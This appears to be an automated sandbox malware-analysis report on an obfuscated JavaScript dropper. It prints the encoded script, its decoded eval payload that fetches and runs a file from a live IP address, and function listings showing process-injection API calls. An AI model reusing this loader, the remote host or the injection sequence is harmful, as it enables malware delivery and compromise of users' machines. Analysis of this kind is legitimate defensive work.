                          Programmed in:C, C++ or other language
                          Reputation:moderate
                          Has exited:false

                          Disassembly

                          Code Analysis

                          Call Graph

                          • Executed
                          • Not Executed
                          callgraph clusterC0 clusterC2C0 clusterC4C0 E1C0 entry:C0 F3C2 fromCharCode E1C0->F3C2 F5C4 eval E1C0->F5C4

                          Script:

                          Code
                          0
                          var P8q = 163834344;
                            1
                            var VGKGLV = String.fromCharCode ( 163834460 - P8q, 163834458 - P8q, 163834465 - P8q, 163834467 - P8q, 163834354 - P8q, 163834462 - P8q, 163834441 - P8q, 163834458 - P8q, 163834376 - P8q, 163834423 - P8q, 163834442 - P8q, 163834450 - P8q, 163834445 - P8q, 163834443 - P8q, 163834460 - P8q, 163834376 - P8q, 163834405 - P8q, 163834376 - P8q, 163834454 - P8q, 163834445 - P8q, 163834463 - P8q, 163834376 - P8q, 163834409 - P8q, 163834443 - P8q, 163834460 - P8q, 163834449 - P8q, 163834462 - P8q, 163834445 - P8q, 163834432 - P8q, 163834423 - P8q, 163834442 - P8q, 163834450 - P8q, 163834445 - P8q, 163834443 - P8q, 163834460 - P8q, 163834384 - P8q, 163834378 - P8q, 163834421 - P8q, 163834427 - P8q, 163834432 - P8q, 163834421 - P8q, 163834420 - P8q, 163834394 - P8q, 163834390 - P8q, 163834432 - P8q, 163834421 - P8q, 163834420 - P8q, 163834416 - P8q, 163834428 - P8q, 163834428 - P8q, 163834424 - P8q, 163834378 - P8q, 163834385 - P8q, 163834403 - P8q, 163834354 - P8q, 163834423 - P8q, 163834442 - P8q, 163834450 - P8q, 163834445 - P8q, 163834443 - P8q, 163834460 - P8q, 163834390 - P8q, 163834423 - P8q, 163834456 - P8q, 163834445 - P8q, 163834454 - P8q, 163834384 - P8q, 163834378 - P8q, 163834415 - P8q, 163834413 - P8q, 163834428 - P8q, 163834378 - P8q, 163834388 - P8q, 163834376 - P8q, 163834378 - P8q, 163834448 - P8q, 163834460 - P8q, 163834460 - P8q, 163834456 - P8q, 163834402 - P8q, 163834391 - P8q, 163834391 - P8q, 163834393 - P8q, 163834401 - P8q, 163834394 - P8q, 163834390 - P8q, 163834394 - P8q, 163834393 - P8q, 163834392 - P8q, 163834390 - P8q, 163834394 - P8q, 163834393 - P8q, 163834397 - P8q, 163834390 - P8q, 163834393 - P8q, 163834393 - P8q, 163834391 - P8q, 163834466 - P8q, 163834455 - P8q, 163834455 - P8q, 163834453 - P8q, 163834391 - P8q, 163834443 - P8q, 163834443 - P8q, 163834390 - P8q, 163834450 - P8q, 163834459 - P8q, 163834378 - P8q, 163834388 - P8q, 163834376 - P8q, 163834446 - P8q, 163834441 - P8q, 163834452 - P8q, 163834459 - P8q, 163834445 - P8q, 163834385 - P8q, 163834403 - P8q, 163834354 - P8q, 163834423 - P8q, 163834442 - P8q, 163834450 - P8q, 163834445 - P8q, 163834443 - P8q, 163834460 - P8q, 163834390 - P8q, 163834427 - P8q, 163834445 - P8q, 163834454 - P8q, 163834444 - P8q, 163834384 - P8q, 163834385 - P8q, 163834403 - P8q, 163834354 - P8q, 163834462 - P8q, 163834441 - P8q, 163834458 - P8q, 163834376 - P8q, 163834446 - P8q, 163834459 - P8q, 163834455 - P8q, 163834376 - P8q, 163834405 - P8q, 163834376 - P8q, 163834454 - P8q, 163834445 - P8q, 163834463 - P8q, 163834376 - P8q, 163834409 - P8q, 163834443 - P8q, 163834460 - P8q, 163834449 - P8q, 163834462 - P8q, 163834445 - P8q, 163834432 - P8q, 163834423 - P8q, 163834442 - P8q, 163834450 - P8q, 163834445 - P8q, 163834443 - P8q, 163834460 - P8q, 163834384 - P8q, 163834378 - P8q, 163834427 - P8q, 163834443 - P8q, 163834458 - P8q, 163834449 - P8q, 163834456 - P8q, 163834460 - P8q, 163834449 - P8q, 163834454 - P8q, 163834447 - P8q, 163834390 - P8q, 163834414 - P8q, 163834449 - P8q, 163834452 - P8q, 163834445 - P8q, 163834427 - P8q, 163834465 - P8q, 163834459 - P8q, 163834460 - P8q, 163834445 - P8q, 163834453 - P8q, 163834423 - P8q, 163834442 - P8q, 163834450 - P8q, 163834445 - P8q, 163834443 - P8q, 163834460 - P8q, 163834378 - P8q, 163834385 - P8q, 163834403 - P8q, 163834354 - P8q, 163834462 - P8q, 163834441 - P8q, 163834458 - P8q, 163834376 - P8q, 163834446 - P8q, 163834449 - P8q, 163834452 - P8q, 163834445 - P8q, 163834456 - P8q, 163834441 - P8q, 163834460 - P8q, 163834448 - P8q, 163834376 - P8q, 163834405 - P8q, 163834376 - P8q, 163834446 - P8q, 163834459 - P8q, 163834455 - P8q, 163834390 - P8q, 163834415 - P8q, 163834445 - P8q, 163834460 - P8q, 163834427 - P8q, 163834456 - P8q, 163834445 - P8q, 163834443 - P8q, 163834449 - P8q, 163834441 - P8q, 163834452 - P8q, 163834414 - P8q, 163834455 - P8q, 163834452 - P8q, 163834444 - P8q, 163834445 - P8q, 163834458 - P8q, 163834384 - P8q, 163834394 - P8q, 163834385 - P8q, 163834376 - P8q, 163834387 - P8q, 163834376 - P8q, 163834378 - P8q, 163834391 - P8q, 163834423 - P8q, 163834420 - P8q, 163834431 - P8q, 163834418 - P8q, 163834421 - P8q, 163834429 - P8q, 163834390 - P8q, 163834450 - P8q, 163834459 - P8q, 163834378 - P8q, 163834403 - P8q, 163834354 - P8q, 163834449 - P8q, 163834446 - P8q, 163834376 - P8q, 163834384 - P8q, 163834423 - P8q, 163834442 - P8q, 163834450 - P8q, 163834445 - P8q, 163834443 - P8q, 163834460 - P8q, 163834390 - P8q, 163834427 - P8q, 163834460 - P8q, 163834441 - P8q, 163834460 - P8q, 163834461 - P8q, 163834459 - P8q, 163834376 - P8q, 163834405 - P8q, 163834405 - P8q, 163834376 - P8q, 163834394 - P8q, 163834392 - P8q, 163834392 - P8q, 163834385 - P8q, 163834354 - P8q, 163834467 - P8q, 163834354 - P8q, 163834462 - P8q, 163834441 - P8q, 163834458 - P8q, 163834376 - P8q, 163834427 - P8q, 163834460 - P8q, 163834458 - P8q, 163834445 - P8q, 163834441 - P8q, 163834453 - P8q, 163834376 - P8q, 163834405 - P8q, 163834376 - P8q, 163834454 - P8q, 163834445 - P8q, 163834463 - P8q, 163834376 - P8q, 163834409 - P8q, 163834443 - P8q, 163834460 - P8q, 163834449 - P8q, 163834462 - P8q, 163834445 - P8q, 163834432 - P8q, 163834423 - P8q, 163834442 - P8q, 163834450 - P8q, 163834445 - P8q, 163834443 - P8q, 163834460 - P8q, 163834384 - P8q, 163834378 - P8q, 163834409 - P8q, 163834412 - P8q, 163834423 - P8q, 163834412 - P8q, 163834410 - P8q, 163834390 - P8q, 163834427 - P8q, 163834460 - P8q, 163834458 - P8q, 163834445 - P8q, 163834441 - P8q, 163834453 - P8q, 163834378 - P8q, 163834385 - P8q, 163834403 - P8q, 163834354 - P8q, 163834427 - P8q, 163834460 - P8q, 163834458 - P8q, 163834445 - P8q, 163834441 - P8q, 163834453 - P8q, 163834390 - P8q, 163834423 - P8q, 163834456 - P8q, 163834445 - P8q, 163834454 - P8q, 163834384 - P8q, 163834385 - P8q, 163834403 - P8q, 163834354 - P8q, 163834427 - P8q, 163834460 - P8q, 163834458 - P8q, 163834445 - P8q, 163834441 - P8q, 163834453 - P8q, 163834390 - P8q, 163834428 - P8q, 163834465 - P8q, 163834456 - P8q, 163834445 - P8q, 163834376 - P8q, 163834405 - P8q, 163834376 - P8q, 163834393 - P8q, 163834403 - P8q, 163834354 - P8q, 163834427 - P8q, 163834460 - P8q, 163834458 - P8q, 163834445 - P8q, 163834441 - P8q, 163834453 - P8q, 163834390 - P8q, 163834431 - P8q, 163834458 - P8q, 163834449 - P8q, 163834460 - P8q, 163834445 - P8q, 163834384 - P8q, 163834423 - P8q, 163834442 - P8q, 163834450 - P8q, 163834445 - P8q, 163834443 - P8q, 163834460 - P8q, 163834390 - P8q, 163834426 - P8q, 163834445 - P8q, 163834459 - P8q, 163834456 - P8q, 163834455 - P8q, 163834454 - P8q, 163834459 - P8q, 163834445 - P8q, 163834410 - P8q, 163834455 - P8q, 163834444 - P8q, 163834465 - P8q, 163834385 - P8q, 163834403 - P8q, 163834354 - P8q, 163834427 - P8q, 163834460 - P8q, 163834458 - P8q, 163834445 - P8q, 163834441 - P8q, 163834453 - P8q, 163834390 - P8q, 163834424 - P8q, 163834455 - P8q, 163834459 - P8q, 163834449 - P8q, 163834460 - P8q, 163834449 - P8q, 163834455 - P8q, 163834454 - P8q, 163834376 - P8q, 163834405 - P8q, 163834376 - P8q, 163834392 - P8q, 163834403 - P8q, 163834354 - P8q, 163834427 - P8q, 163834460 - P8q, 163834458 - P8q, 163834445 - P8q, 163834441 - P8q, 163834453 - P8q, 163834390 - P8q, 163834427 - P8q, 163834441 - P8q, 163834462 - P8q, 163834445 - P8q, 163834428 - P8q, 163834455 - P8q, 163834414 - P8q, 163834449 - P8q, 163834452 - P8q, 163834445 - P8q, 163834384 - P8q, 163834446 - P8q, 163834449 - P8q, 163834452 - P8q, 163834445 - P8q, 163834456 - P8q, 163834441 - P8q, 163834460 - P8q, 163834448 - P8q, 163834388 - P8q, 163834376 - P8q, 163834394 - P8q, 163834385 - P8q, 163834403 - P8q, 163834354 - P8q, 163834427 - P8q, 163834460 - P8q, 163834458 - P8q, 163834445 - P8q, 163834441 - P8q, 163834453 - P8q, 163834390 - P8q, 163834411 - P8q, 163834452 - P8q, 163834455 - P8q, 163834459 - P8q, 163834445 - P8q, 163834384 - P8q, 163834385 - P8q, 163834403 - P8q, 163834354 - P8q, 163834462 - P8q, 163834441 - P8q, 163834458 - P8q, 163834376 - P8q, 163834431 - P8q, 163834459 - P8q, 163834448 - P8q, 163834427 - P8q, 163834448 - P8q, 163834445 - P8q, 163834452 - P8q, 163834452 - P8q, 163834376 - P8q, 163834405 - P8q, 163834376 - P8q, 163834454 - P8q, 163834445 - P8q, 163834463 - P8q, 163834376 - P8q, 163834409 - P8q, 163834443 - P8q, 163834460 - P8q, 163834449 - P8q, 163834462 - P8q, 163834445 - P8q, 163834432 - P8q, 163834423 - P8q, 163834442 - P8q, 163834450 - P8q, 163834445 - P8q, 163834443 - P8q, 163834460 - P8q, 163834384 - P8q, 163834378 - P8q, 163834431 - P8q, 163834427 - P8q, 163834443 - P8q, 163834458 - P8q, 163834449 - P8q, 163834456 - P8q, 163834460 - P8q, 163834390 - P8q, 163834427 - P8q, 163834448 - P8q, 163834445 - P8q, 163834452 - P8q, 163834452 - P8q, 163834378 - P8q, 163834385 - P8q, 163834403 - P8q, 163834354 - P8q, 163834462 - P8q, 163834441 - P8q, 163834458 - P8q, 163834376 - P8q, 163834455 - P8q, 163834426 - P8q, 163834429 - P8q, 163834422 - P8q, 163834376 - P8q, 163834405 - P8q, 163834376 - P8q, 163834431 - P8q, 163834459 - P8q, 163834448 - P8q, 163834427 - P8q, 163834448 - P8q, 163834445 - P8q, 163834452 - P8q, 163834452 - P8q, 163834390 - P8q, 163834426 - P8q, 163834461 - P8q, 163834454 - P8q, 163834384 - P8q, 163834446 - P8q, 163834449 - P8q, 163834452 - P8q, 163834445 - P8q, 163834456 - P8q, 163834441 - P8q, 163834460 - P8q, 163834448 - P8q, 163834385 - P8q, 163834403 - P8q, 163834354 - P8q, 163834469 - P8q, 163834354 - P8q, 163834469 - P8q, 163834354 - P8q, 163834443 - P8q, 163834441 - P8q, 163834460 - P8q, 163834443 - P8q, 163834448 - P8q, 163834384 - P8q, 163834445 - P8q, 163834385 - P8q, 163834467 - P8q, 163834469 - P8q, 163834354 - P8q );
                              2
                              eval ( VGKGLV );
                              • eval("try{ var Object = new ActiveXObject("MSXML2.XMLHTTP"); Object.Open("GET", "http://192.210.215.11/zoom/cc.js", false); Object.Send(); var fso = new ActiveXObject("Scripting.FileSystemObject"); var filepath = fso.GetSpecialFolder(2) + "/OLWJMU.js"; if (Object.Status == 200) { var Stream = new ActiveXObject("ADODB.Stream"); Stream.Open(); Stream.Type = 1; Stream.Write(Object.ResponseBody); Stream.Position = 0; Stream.SaveToFile(filepath, 2); Stream.Close(); var WshShell = new ActiveXObject("WScript.Shell"); var oRUN = WshShell.Run(filepath); } } catch(e){} ") ➔ undefined
                              Reset < >

                                Execution Graph

                                Execution Coverage:18%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:17
                                Total number of Limit Nodes:2
                                execution_graph 2318 2a91ba8 2319 2a91c35 CreateProcessW 2318->2319 2321 2a91d8e 2319->2321 2322 2a92338 ResumeThread 2323 2a923c0 2322->2323 2324 2a921f8 2325 2a92261 2324->2325 2326 2a92276 WriteProcessMemory 2324->2326 2325->2326 2327 2a922d8 2326->2327 2328 2a91ec8 2329 2a91f3b Wow64SetThreadContext 2328->2329 2330 2a91f26 2328->2330 2331 2a91f84 2329->2331 2330->2329 2332 2a91fd8 ReadProcessMemory 2333 2a92097 2332->2333 2334 2a920f0 VirtualAllocEx 2335 2a921a7 2334->2335

                                Executed Functions

                                Function 02A90D33 Relevance: 1.8, Strings: 1, Instructions: 585COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 0 2a90d33-2a90d71 1 2a90d78-2a90f15 0->1 2 2a90d73 0->2 9 2a90f42-2a90f87 call 2a907a4 1->9 10 2a90f17-2a90f41 1->10 2->1 14 2a90f89-2a90fa4 9->14 15 2a90faf-2a91013 9->15 10->9 14->15 21 2a9101a-2a91046 15->21 22 2a91015 15->22 24 2a91048-2a91055 call 2a907b0 21->24 25 2a910a6-2a910d8 call 2a907bc 21->25 22->21 29 2a9105a-2a9107a 24->29 30 2a910da-2a910f5 25->30 31 2a91100 25->31 32 2a9107c-2a91097 29->32 33 2a910a2-2a910a4 29->33 30->31 34 2a91101-2a9110b 31->34 32->33 33->34 36 2a9110d 34->36 37 2a91112-2a91158 call 2a907c8 34->37 36->37 43 2a9115a-2a91175 37->43 44 2a91180-2a91199 37->44 43->44 45 2a9119b-2a911c7 call 2a907d4 44->45 46 2a911f0-2a91259 call 2a907e0 44->46 52 2a911c9-2a911e4 45->52 53 2a911ef 45->53 58 2a9125b-2a9126c 46->58 59 2a9126e-2a91270 46->59 52->53 53->46 61 2a91276-2a9128a 58->61 59->61 62 2a9128c-2a912bd call 2a907e0 61->62 63 2a912be-2a912d5 61->63 62->63 64 2a912fd-2a91332 call 2a907ec 63->64 65 2a912d7-2a912f2 63->65 71 2a9135a-2a9138c 64->71 72 2a91334-2a9134f 64->72 65->64 76 2a914cd-2a914ec 71->76 72->71 77 2a91391-2a9140c 76->77 78 2a914f2-2a91546 call 2a907ec 76->78 90 2a914c2-2a914c7 77->90 91 2a91412-2a91474 call 2a907ec 77->91 85 2a91548-2a91563 78->85 86 2a9156e-2a9159b 78->86 85->86 92 2a9159d-2a915a0 86->92 93 2a915a3-2a915b3 86->93 90->76 105 2a91479-2a91499 91->105 92->93 95 2a915ba-2a915e5 93->95 96 2a915b5 93->96 100 2a91645-2a91677 call 2a90804 95->100 101 2a915e7-2a915f4 call 2a907f8 95->101 96->95 112 2a91679-2a91694 100->112 113 2a9169f 100->113 106 2a915f9-2a91619 101->106 107 2a9149b-2a914b6 105->107 108 2a914c1 105->108 110 2a9161b-2a91636 106->110 111 2a91641-2a91643 106->111 107->108 108->90 110->111 115 2a916a0-2a916a6 call 2a90810 111->115 112->113 113->115 120 2a916ab-2a916cb 115->120 122 2a916cd-2a916e8 120->122 123 2a916f3-2a91785 120->123 122->123
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1507583295.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2a90000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID: (
                                • API String ID: 0-3887548279
                                • Opcode ID: a138e8d0dfc8a2c077492e56e51af94dec5e315be6e41ca041d99fd473eb7f19
                                • Instruction ID: f8523dd101c68062b331df53e20b3111879d3e58e357e8913f4d36456a0df03d
                                • Opcode Fuzzy Hash: a138e8d0dfc8a2c077492e56e51af94dec5e315be6e41ca041d99fd473eb7f19
                                • Instruction Fuzzy Hash: C352AF74E012298FEB68DF66C984BDDB7F2AF89300F5081E9D409AB291DB345E84CF50
                                Function 02A91B9C Relevance: 1.7, APIs: 1, Instructions: 223processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 129 2a91b9c-2a91c33 132 2a91c4a-2a91c58 129->132 133 2a91c35-2a91c47 129->133 134 2a91c5a-2a91c6c 132->134 135 2a91c6f-2a91cab 132->135 133->132 134->135 136 2a91cad-2a91cbc 135->136 137 2a91cbf-2a91d8c CreateProcessW 135->137 136->137 141 2a91d8e-2a91d94 137->141 142 2a91d95-2a91e54 137->142 141->142 152 2a91e8a-2a91e95 142->152 153 2a91e56-2a91e7f 142->153 157 2a91e96 152->157 153->152 157->157
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02A91D79
                                Memory Dump Source
                                • Source File: 00000004.00000002.1507583295.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2a90000_GeUT.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 3dcc1da143d6d94538122c4a82f0dd3fde7ba7b66e316209e497c463db17ad23
                                • Instruction ID: bb8614a5a1d164d16588e57832ea0ad3eaa291e3eb307b109098839867c8a323
                                • Opcode Fuzzy Hash: 3dcc1da143d6d94538122c4a82f0dd3fde7ba7b66e316209e497c463db17ad23
                                • Instruction Fuzzy Hash: 7A81B275D0022ADFDF20DFA9C880BDDBBF5AB49304F1091AAE508B7260DB709A85CF54
                                Function 02A91BA8 Relevance: 1.7, APIs: 1, Instructions: 220processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 158 2a91ba8-2a91c33 159 2a91c4a-2a91c58 158->159 160 2a91c35-2a91c47 158->160 161 2a91c5a-2a91c6c 159->161 162 2a91c6f-2a91cab 159->162 160->159 161->162 163 2a91cad-2a91cbc 162->163 164 2a91cbf-2a91d8c CreateProcessW 162->164 163->164 168 2a91d8e-2a91d94 164->168 169 2a91d95-2a91e54 164->169 168->169 179 2a91e8a-2a91e95 169->179 180 2a91e56-2a91e7f 169->180 184 2a91e96 179->184 180->179 184->184
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02A91D79
                                Memory Dump Source
                                • Source File: 00000004.00000002.1507583295.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2a90000_GeUT.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 617f615094b3b6e35bdba68c6da90a32adfc99e6ad2d3ea41f2d72946885c2a1
                                • Instruction ID: 0e180c8ae41a4a8d037dea07a52b51cb41e2a3daf8253b4d32f55e7902fbc463
                                • Opcode Fuzzy Hash: 617f615094b3b6e35bdba68c6da90a32adfc99e6ad2d3ea41f2d72946885c2a1
                                • Instruction Fuzzy Hash: EC81B275D0026ADFDF20DFA9C880BDDBBF5AB49304F1091AAE508B7260DB709A85CF54
                                Function 02A921F8 Relevance: 1.6, APIs: 1, Instructions: 110injectionCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 185 2a921f8-2a9225f 186 2a92261-2a92273 185->186 187 2a92276-2a922d6 WriteProcessMemory 185->187 186->187 188 2a922d8-2a922de 187->188 189 2a922df-2a9231d 187->189 188->189
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02A922C6
                                Memory Dump Source
                                • Source File: 00000004.00000002.1507583295.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2a90000_GeUT.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: 75e37cf0c061d000a733cc65c12958a4e1d4a0adfbcc8908277c42b77ba21ef5
                                • Instruction ID: 0e4473ce50d0e6309d1687e6ed61cc0b37f6657a437fcad29a4c8bf608012974
                                • Opcode Fuzzy Hash: 75e37cf0c061d000a733cc65c12958a4e1d4a0adfbcc8908277c42b77ba21ef5
                                • Instruction Fuzzy Hash: E54168B5D002589FCF10CFAAD984ADEFBF1BB49314F24902AE818B7210D375AA45CF64
                                Function 02A921F0 Relevance: 1.6, APIs: 1, Instructions: 109injectionCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 192 2a921f0-2a9225f 193 2a92261-2a92273 192->193 194 2a92276-2a922d6 WriteProcessMemory 192->194 193->194 195 2a922d8-2a922de 194->195 196 2a922df-2a9231d 194->196 195->196
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02A922C6
                                Memory Dump Source
                                • Source File: 00000004.00000002.1507583295.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2a90000_GeUT.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: 7d77e535a30252a6d2b1e9a4607683f8dc83cae3cb2c0b58e3f962777d0f56f1
                                • Instruction ID: 85379126e2df233b885b4be36585b4a71c66dc3893b22d3b473b3b614a66965c
                                • Opcode Fuzzy Hash: 7d77e535a30252a6d2b1e9a4607683f8dc83cae3cb2c0b58e3f962777d0f56f1
                                • Instruction Fuzzy Hash: B54177B9D002589FCF00CFA9D984A9DFBF1BB49314F24902AE818B7250D734AA45CB64
                                Function 02A91FD8 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 199 2a91fd8-2a92095 ReadProcessMemory 200 2a9209e-2a920dc 199->200 201 2a92097-2a9209d 199->201 201->200
                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02A92085
                                Memory Dump Source
                                • Source File: 00000004.00000002.1507583295.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2a90000_GeUT.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: faf96a57f64cab6e116f2270c6eea5a201e01b2ce7514c528447ff2f1549c1bb
                                • Instruction ID: 1cdabe6d8a331b6ecb28a15796fa45f19b3086b2c5fed22c9779b2f7836f90d7
                                • Opcode Fuzzy Hash: faf96a57f64cab6e116f2270c6eea5a201e01b2ce7514c528447ff2f1549c1bb
                                • Instruction Fuzzy Hash: 1F3166B9D042589FCF10CFAAD984ADEFBF5BB19310F14A02AE814B7210D375A945CF64
                                Function 02A920E8 Relevance: 1.6, APIs: 1, Instructions: 98memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 209 2a920e8-2a920eb 210 2a920f0-2a921a5 VirtualAllocEx 209->210 211 2a921ae-2a921e4 210->211 212 2a921a7-2a921ad 210->212 212->211
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02A92195
                                Memory Dump Source
                                • Source File: 00000004.00000002.1507583295.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2a90000_GeUT.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 3d76444f685a52005e15e147764c61566e98d073f3ff9cef9c2b04e33f914b68
                                • Instruction ID: 7df59601f70dcc34270b6f6a02327015df9452600f64c0f83dc842b605a324fa
                                • Opcode Fuzzy Hash: 3d76444f685a52005e15e147764c61566e98d073f3ff9cef9c2b04e33f914b68
                                • Instruction Fuzzy Hash: 843167B9D002589FCF10CFAAD980A9EFBF5BB09310F10902AE914B7310D335A955CF64
                                Function 02A91FD0 Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 204 2a91fd0-2a92095 ReadProcessMemory 205 2a9209e-2a920dc 204->205 206 2a92097-2a9209d 204->206 206->205
                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02A92085
                                Memory Dump Source
                                • Source File: 00000004.00000002.1507583295.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2a90000_GeUT.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: 9508e57aeea682e8975047f187d65093224b3b2ac859412c2aa3249165fd0b0d
                                • Instruction ID: ef835cad5f992d0612feb8e559798ebb4b71d1bc6711a30864bd7ea99f74500a
                                • Opcode Fuzzy Hash: 9508e57aeea682e8975047f187d65093224b3b2ac859412c2aa3249165fd0b0d
                                • Instruction Fuzzy Hash: 0D3176B9D04258DFCF10CFAAD580ADEFBB1BB19310F14A02AE818B7210C335A945CF64
                                Function 02A920F0 Relevance: 1.6, APIs: 1, Instructions: 95memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 215 2a920f0-2a921a5 VirtualAllocEx 216 2a921ae-2a921e4 215->216 217 2a921a7-2a921ad 215->217 217->216
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02A92195
                                Memory Dump Source
                                • Source File: 00000004.00000002.1507583295.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2a90000_GeUT.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: e6848e1a0cc04bba81e6af9a9da9ae30e3f7c1e25c4fa08cfeba335872659b0e
                                • Instruction ID: aed77d4dc2a71002bee368d3c8b8642cf08c30c1e012281862f921e3a837232f
                                • Opcode Fuzzy Hash: e6848e1a0cc04bba81e6af9a9da9ae30e3f7c1e25c4fa08cfeba335872659b0e
                                • Instruction Fuzzy Hash: BB3156B9D042589FCF10CFAAD984A9EFBF5BB09310F20A02AE914B7310D735A955CF65
                                Function 02A91EC3 Relevance: 1.6, APIs: 1, Instructions: 89threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 220 2a91ec3-2a91f24 222 2a91f3b-2a91f82 Wow64SetThreadContext 220->222 223 2a91f26-2a91f38 220->223 224 2a91f8b-2a91fc3 222->224 225 2a91f84-2a91f8a 222->225 223->222 225->224
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 02A91F72
                                Memory Dump Source
                                • Source File: 00000004.00000002.1507583295.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2a90000_GeUT.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: 271b77a8f0fbfd840bc23dfe584676ecd77b693684bd175fef4f6290b3b60d2b
                                • Instruction ID: e3355b53bccfaed06a1abe86be9b5f22747b8b9ea8fb7c828741ff103f2f16e1
                                • Opcode Fuzzy Hash: 271b77a8f0fbfd840bc23dfe584676ecd77b693684bd175fef4f6290b3b60d2b
                                • Instruction Fuzzy Hash: 9D31A8B5D012599FCB10CFAAD984ADEFBF1BB49314F24802AE418B7250D778AA45CF64
                                Function 02A91EC8 Relevance: 1.6, APIs: 1, Instructions: 88threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 228 2a91ec8-2a91f24 229 2a91f3b-2a91f82 Wow64SetThreadContext 228->229 230 2a91f26-2a91f38 228->230 231 2a91f8b-2a91fc3 229->231 232 2a91f84-2a91f8a 229->232 230->229 232->231
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 02A91F72
                                Memory Dump Source
                                • Source File: 00000004.00000002.1507583295.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2a90000_GeUT.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: 0eff942833b320d00f557d4e0c879d1137192b91dfd73567bdd8fd308109df2d
                                • Instruction ID: ed46462d53b190d733aba19071112bef48ef565dde11cc7e25264495f379ac41
                                • Opcode Fuzzy Hash: 0eff942833b320d00f557d4e0c879d1137192b91dfd73567bdd8fd308109df2d
                                • Instruction Fuzzy Hash: 6931A7B4D012599FCF10CFAAD984ADEFBF1BB49314F24802AE418B7210D778AA45CF64
                                Function 02A92333 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
